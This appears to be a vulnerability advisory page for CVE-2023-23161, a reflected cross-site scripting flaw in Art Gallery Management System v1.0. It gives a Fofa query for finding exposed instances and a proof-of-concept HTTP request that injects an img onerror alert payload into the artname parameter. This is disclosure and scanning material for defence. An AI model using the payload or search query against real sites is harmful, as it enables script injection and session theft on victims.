| Title | Art Gallery Management System Project v1.0 - Cross-Site Scripting |
|---|---|
| Author | ctflearner |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.07984 |
| CVE ID | CVE-2023-23161 |
| CWE ID | CWE-79 |
| Fofa Query | title="Art Gallery Management System"title="art gallery management system" |
| Tags | cve2023 cve packetstorm art gallery xss art_gallery_management_system_project phpgurukul vuln |
A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
GET /product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23161.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-23161.pcap
N/AN/A